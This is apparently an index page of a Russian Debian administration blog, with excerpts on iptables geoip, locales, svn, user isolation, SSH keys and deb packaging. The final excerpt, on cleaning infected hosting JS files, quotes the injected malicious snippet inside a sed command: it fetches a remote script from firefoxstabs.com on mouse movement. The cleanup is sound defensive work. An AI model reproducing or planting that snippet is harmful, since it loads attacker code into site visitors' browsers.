Debian.pro

Про Debian


Администрирование

iptables+geoip. Баним по странам через iptables. Установка iptables-geoip/netfilter-geoip в Debian Squeeze.

UPD: начиная с Debian 8 Jessie в non-free репозитории есть пакет xtables-addon Соответственно, тем, у кого jessie и выше, статью можно не читать, а просто сделать так: apt-get install xtables-addon Часто в разговоре с заказчиками или со знакомыми начинающими админами мелькает фраза «а забань китай!». Если админы говорят это с юмором, то заказчики — на [...]

Ubuntu server, английская система с поддержкой русской локали. Устраняем ошибки LC_MESSAGE, LC_ALL, LC_CTYPE и прочие.

Сейчас долго и вдумчиво тупил над одним странным обстоятельством. Я (и мои пользователи-клиенты) привык к тому, что на серверах стоит английская система. И, само собой, в этой системе по ssh можно печатать по-русски. К тому же, это удобно — можно держать универсальные образы для английских и русских клиентов. В первую очередь, само собой, проблема касается [...]

Скрипты для создания БД в mysql.

Дада, кто-то уже догадался, что я уселся за скрипт, который автоматизирует настройку и добавление новых сайтов на nginx+amp в debian squeeze. Почти все скрипты уже готовы, сейчас я думаю как лучше их обернуть в одну общую оболочку. Тем временем скрипты для создания новых баз данных уже готовы, так как больше всего меня утомляет создавать их [...]

svn и русские имена файлов

Автор поста: [v-8]_jupiter И так очередное решение проблемы когда в репозиторий svn не проходит comit (не добавляются) файлы с русскими  именами. Решение очень простое если вы настривали svn моим способом то добавьте в hook post-comit строчку перед чекаутом  с репозитория export LC_CTYPE=»en_US.UTF-8″ Имейте ввиду что локаль у меня на сервере стоит: LANG=en_US.UTF-8 LC_CTYPE=»en_US.UTF-8″ LC_NUMERIC=»en_US.UTF-8″ Удачных комитов))).

Debian, создаём пользователей так, чтобы они не могли ходить друг к другу в домашнюю папку.

Вчера для одного проекта понадобилось создавать пользователей с условием того, чтобы они никогда не смогли зайти в чужую домашнюю папку (дада, хостинг с mod_php без вебморды для панели управления). Строим велосипеды в общем. Но в целом мне такое приходится делать часто и руками надоело. Поэтому набросал готовый скриптик, который создает пользователя с рандомным паролем. Скриптик [...]

Меняем пароль пользователю из bash скрипта (или просто командой из шелла).

Сейчас на КИТе нашли отличный способ сменить пароль пользователю из шелла (а значит и из скрипта). В общем, кто сталкивался с этой проблемой — поймут меня. UPD: в комментариях указали другой способ смены пароля от рута: root@host:~# echo «username:password» | chpasswd Такой способ тоже подходит, но не является универсальным. Например, во FreeBSD утилиты chpasswd нет. [...]

SSH ключи.

Я часто упоминаю в статьях ssh ключи. В определенный момент ко мне пришло осознание того, что про них-то написать я и забыл. Статья примитивная, но «чтобы было». Опытные пользователи в статье заметят много странностей, они смогут сказать много «а вот тут можно и так». man ssh-keygen я и сам могу почитать. И вы можете. Я [...]

Используем chroot и debootstrap для всяких светлых целей — тестирование скриптов, программ и прочего.

Вообще в этих целях неплохо использовать виртуализацию. Но тут есть некоторые проблемы, которых лишен обычный chroot. Сразу отсеиваем Xen, KVM, vbox — слишком долго развертывается, кушает слишком много ресурсов, требует поддержки hw-виртуализации. Openvz — требует специального ядра, которое может и не поддерживать вашу железку (да и вообще не хочется сидеть на 32м ядре на ноуте). [...]

Простейший способ собрать свой deb-пакет с данными (например, с конфигами, скриптами, ключами авторизации).

Частенько возникает необходимость собрать пакет с какими либо файлами, из которых скомпилировать ничего нельзя. В моём случае это чаще всего самописные bash-скрипты, файл с public ключами ssh… Ещё интересная идея так же паковать архивы. В рассмотренном ниже примере мы создадим один deb пакет с аж тремя вкусными штуками: 1) конфигурационные файлы nginx с нашего сервера [...]

Зараженный js на хостинге

Вот столкнулся с такой штукой что во всех js файлах одного аккаунта были прописаны левые ссылки. Лечим таким образом в командной строке делаем : find 55 -name «*.js» |xargs sed -i «s|document.write(‘<scr’+’ipt src=\»https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js\»></scr’+’ipt>’);var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1;x.getScript(‘http://firefoxstabs.com/’ + Math.random().toString().substring(3) + ‘.js’, function() {flag = 2;});}});});| [...]